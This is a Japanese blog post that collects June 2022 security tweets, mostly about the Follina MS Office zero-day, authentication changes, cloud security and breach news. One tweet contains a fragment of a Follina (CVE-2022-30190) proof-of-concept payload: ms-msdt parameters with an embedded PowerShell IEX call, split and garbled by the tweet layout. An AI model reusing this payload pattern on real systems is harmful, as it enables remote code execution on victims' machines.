2022/6/4 セキュリティ関連Twitterメモ
2nd "Offensive Cyber Operations" (hardback out in Europe!) tidbit - We often view offensive cyber as the child of SIGINT agencies, but we can learn so much about military cyber by looking at what it inherited from both SIGINT and Electronic Warfare (EW). https://t.co/Oi0t2dkOt3
— Daniel Moore (@ILDannyMoore) May 28, 2022
ここでは要するにメール系プロトコルで使われるパスワード認証のこと。今後はOAuth2.0を使う。主なMUAは対応してるが自動でメール送信するツール類が未対応で困るかも知れない。RPAとか注意。MS365も9月末で廃止のはず。 / “個人向けGoogleアカウントでの基本認証は5月30日…” https://t.co/PZB4NnFv1m
— 上原 哲太郎/Tetsu. Uehara (@tetsutalow) May 29, 2022
「今回の取り組みにおける最大距離は40mm」とのこと。 iPhoneなどタッチパネル触らずに電磁干渉で操作する攻撃手法、発見 | TECH+ https://t.co/uS58bANfAe
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) May 30, 2022
AWS Lambdaにおけるセキュリティリスクと対策 https://t.co/crg2W2sdTx #secjaws #secjaws25 #jawsug
— morioka12 (@scgajge12) May 30, 2022
Microsoft Officeの新ゼロデイ「Follina」(CVE未受領)がMicrosoft Diagnostic Tool (MSDT)からPowerShellを実行する攻撃で使われている。Word文書を開くだけで発動。@nao_secがVirusTotalで検体を発見。外部からHTMLテンプレートを落とし、そこからms-msdtスキームを使う。 https://t.co/aQSSGQBtFj
— kokum?t? (@__kokumoto) May 30, 2022
サイバー警察局を新設させた「危機感」、初代サイバー捜査課長が自ら語る https://t.co/zMna96DTsG 『司令塔としてのサイバー警察局、捜査機関としてのサイバー特別捜査隊』 なるほどね。
— にゃん☆たく (@taku888infinity) May 30, 2022
Windows、誰得な謎プロトコルスキーム経由で任意コード実行が可能になる脆弱性が定期的に見つかってる印象。
— Yosuke HASEGAWA (@hasegawayosuke) May 31, 2022
『「国民のための情報セキュリティサイト」を全面刷新し、本ページを公開しました。 (2022/05/27) 』 総務省 国民のためのサイバーセキュリティサイト https://t.co/ozfqVuKX7b
— Autumn Good (@autumn_good_35) May 31, 2022
ms-msdtでOfficeでマクロ使わないでもPowerShellのコード実行できる件が話題になってますね。。 一時的な緩和策としては、ms-msdtのレジストリエントリを削除する方法があるとのこと https://t.co/lcz3d8ogiD
— ほよたか (@takahoyo) May 31, 2022
「Impervaが軽減した3つの最大のDDoS攻撃」 https://t.co/F0N7kcWTGH
— キタきつね (@foxbook) May 31, 2022
#転記 awsがIAM mfaにfidoサポート。わーい。ヤッター、rootアカウントのハードウェアキー複数登録まだ?? https://t.co/GAH0zZfybl
— ken\d|\x (@ken5scal) May 31, 2022
感染者5人の個人情報、迷惑メール発信元に誤送信 さらに履歴を削除:朝日新聞デジタル https://t.co/EUGa6vhzFa #新型コロナウイルス
— piyokango (@piyokango) Jun 1, 2022
ロードバランサー機器に対する不正アクセスにおける新たに認知した事象について 2022年5月31日 富士通クラウドテクノロジーズ株式会社 https://t.co/hbbg3p3eVB
— piyokango (@piyokango) Jun 1, 2022
0-day [CVE-2022-30190] MS Offic RCE aka msdt follina Target = "http://
— Jinwook Kim (@wugeej) Jun 2, 2022/payload.html! " TargetMode = "External" IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../Windows/System32 https://t.co/Bci6gVBWJn https://t.co/hc2TcRoOQt
「パスワード管理」の現実解 https://t.co/C4iPShbdyq
— にゃん☆たく (@taku888infinity) Jun 2, 2022
デジタル庁周辺「デジタル以前に仲が悪い」、組織超えた勉強会合宿は処方箋か | 日経クロステック(xTECH) https://t.co/37pt3lfvPx
— takesako (y0sh1) (@takesako) Jun 2, 2022
「DeepPass ?ディープラーニングでパスワードを見つける」 https://t.co/RekyNq3VeJ
— キタきつね (@foxbook) Jun 2, 2022
MIT Tech Review: 中国版ギットハブ、コードを検閲・遮断か? OSS開発者に衝撃 https://t.co/ZjNgSkigSo
— takesako (y0sh1) (@takesako) Jun 2, 2022
DEF CON GTF 2022 Writeup https://t.co/WxzqgRqPkI
— ptr-yudai (@ptrYudai) Jun 2, 2022
Conti がFirmware をターゲットにしていたことがConti leaksで分かったとEclypsium による解説 https://t.co/0YcnWy22pS
— tadmaddad (@tadmaddad) Jun 2, 2022
検知困難な「LOL攻撃」の実態 https://t.co/Yr7GOD7gwE
— にゃん☆たく (@taku888infinity) Jun 3, 2022
産学でセキュリティー人材育成 ビズリーチは高専に講師: 日本経済新聞 https://t.co/zmYWArAsTo
— takesako (y0sh1) (@takesako) Jun 3, 2022
VMware、脅威インテリジェンス機能「VMware Contexa」発表 - NSXなどに標準装備 https://t.co/S0PKezB81n
— モグ|セキュリティゼネラリスト (@moneymog) Jun 4, 2022
デジタル・アイデンティティのセキュリティを考える#2 NIST SP 800-63-3のDigital Identity Modelを理解する https://t.co/lcv7heR5lr
— モグ|セキュリティゼネラリスト (@moneymog) Jun 4, 2022
Microsoftの診断ツールに見つかったゼロデイ脆弱性「Follina」を中国関連の脅威アクターが悪用している https://t.co/BRr2NRdjyJ
— モグ|セキュリティゼネラリスト (@moneymog) Jun 4, 2022